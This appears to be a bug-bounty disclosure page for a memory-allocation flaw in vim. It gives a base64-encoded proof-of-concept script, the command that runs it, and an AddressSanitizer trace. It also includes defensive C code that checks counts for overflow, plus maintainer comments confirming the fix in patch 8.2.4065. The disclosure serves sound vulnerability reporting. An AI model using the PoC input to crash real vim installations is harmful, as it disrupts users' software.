Allocation of Resources Without Limits or Throttling in vim/vim

Valid

Reported on

Jan 10th 2022


Description

Memory Allocation with Excessive Size Value

Proof of Concept

Base64-encoded PoC script (decode it to ./poc before running the command below):
aAp2ewp5Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3NzcKXQo=
vim -u NONE -X -Z -e -s -S ./poc -c :qa!
==1206187==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffff8 (0x7f8 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x49626d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49626d)
    #1 0x4c5d75  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d75)
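The ASan line above asks malloc for 0xfffffffffffffff8 bytes, i.e. (size_t)-8: a count that was never bounds-checked has turned into a nonsensical allocation size. Decoding the base64 PoC (my decoding, not stated on the page) gives a four-line script whose third line is `y` followed by 23 sevens, a yank count far beyond what 64 bits can hold. The following is an added illustration of that bug class and of the checks that stop it; it is constructed for this page and is not vim's code or the 8.2.4065 patch. `POC_COUNT_DIGITS`, `naive_parse_count`, `parse_count_checked`, `checked_alloc_size` and `alloc_for_count` are all hypothetical names.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Constructed from the page's PoC: the decoded script passes 23 sevens as
 * the count of the "y" command. */
#define POC_COUNT_DIGITS "77777777777777777777777"

/* Naive digit accumulator (illustration of the bug class, not vim's parser):
 * once the number exceeds 64 bits the accumulator wraps modulo 2^64 and the
 * caller receives a plausible-looking but completely wrong count. */
uint64_t naive_parse_count(const char *s) {
    uint64_t acc = 0;
    for (; *s >= '0' && *s <= '9'; s++)
        acc = acc * 10 + (uint64_t)(*s - '0');   /* unsigned wrap, no diagnostic */
    return acc;
}

/* Checked parser: rejects a leading sign or whitespace, trailing junk,
 * values that do not fit in 64 bits (ERANGE), and any count above a
 * caller-supplied limit such as the number of lines actually in the buffer. */
bool parse_count_checked(const char *s, uint64_t limit, uint64_t *out) {
    char *end;
    if (*s < '0' || *s > '9') return false;          /* strtoull would accept "-5" */
    errno = 0;
    unsigned long long v = strtoull(s, &end, 10);
    if (*end != '\0') return false;                  /* not a plain number */
    if (errno == ERANGE) return false;               /* overflowed 64 bits */
    if (v > limit) return false;                     /* more than exists */
    *out = (uint64_t)v;
    return true;
}

/* Size computation with overflow detection: count * elem_size must fit in
 * size_t, otherwise malloc would be handed a size like the 0xfffffffffffffff8
 * in the ASan report above. */
bool checked_alloc_size(uint64_t count, size_t elem_size, size_t *out) {
    if (elem_size != 0 && count > SIZE_MAX / elem_size) return false;
    *out = (size_t)count * elem_size;
    return true;
}

/* Allocate room for 'count_str' elements of 'elem_size' bytes, or return NULL
 * if the count is malformed, too large for the buffer, or would overflow. */
void *alloc_for_count(const char *count_str, uint64_t limit, size_t elem_size) {
    uint64_t count;
    size_t bytes;
    if (!parse_count_checked(count_str, limit, &count)) return NULL;
    if (!checked_alloc_size(count, elem_size, &bytes)) return NULL;
    return malloc(bytes);
}
```

The limit argument is the check that matters most in an editor: a line count can never legitimately exceed the number of lines present, so clamping or rejecting at that point removes the need to reason about what the arithmetic does further down.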
We are processing your report and will contact the vim team within 24 hours. a year ago
We have contacted a member of the vim team and are waiting to hear back a year ago
Bram Moolenaar validated this vulnerability a year ago
aidaip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bram Moolenaar
a year ago

Maintainer


I can reproduce the problem. It would cause the allocation to fail; I don't see any other side effect. I can solve it anyway.

Bram Moolenaar
a year ago

Maintainer


Fixed by patch 8.2.4065, which adds a simple test based on the POC.

Bram Moolenaar marked this as fixed in 8.2 with commit 3cf21b a year ago
Bram Moolenaar has been awarded the fix bounty
This vulnerability will not receive a CVE